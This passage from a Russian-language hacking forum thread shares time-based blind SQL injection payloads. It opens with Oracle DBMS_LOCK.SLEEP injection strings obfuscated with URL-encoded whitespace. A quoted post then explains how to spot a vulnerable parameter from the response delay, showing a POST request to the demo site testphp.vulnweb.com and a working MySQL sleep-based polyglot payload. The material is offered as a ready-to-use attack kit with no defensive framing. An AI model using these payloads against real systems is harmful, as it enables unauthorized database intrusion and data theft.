bEGiN%09DBMS_LOCK.SLEEP(10);%0AENd;
{base}',bEGiN%0DDBMS_LOCK.SLEEP(10);%0CENd;
{base},bEGiN%0ADBMS_LOCK.SLEEP(10);%0CENd;
Не могу еще списки откопать, где то на SSD валяется еще куча всякого, как нибудь потом дополню возможно. Ну сам погугли, добавь что-то :)
 
Последнее редактирование:
c0d3x сказал(а):
В случае если параметр уязвим к Time-Based SQLi, ты это поймешь по времени ответа таргета, оно будет в виде пятизначного числа. Напротив пейлоада увидишь например 58372.
  • Вот как выглядит детект, на примере вышеупомянутого testphp.vulnweb.com:
6.png

  • Задержка на пейлоад 12846 миллисекунд.
  • Тестировался параметр searchFor=12345 в POST запросе:
Код: 
POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

searchFor=12345&goButton=go
  • Пейлоад который отработал (есть в списке под MySQL который выше скинул)
Код: 
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх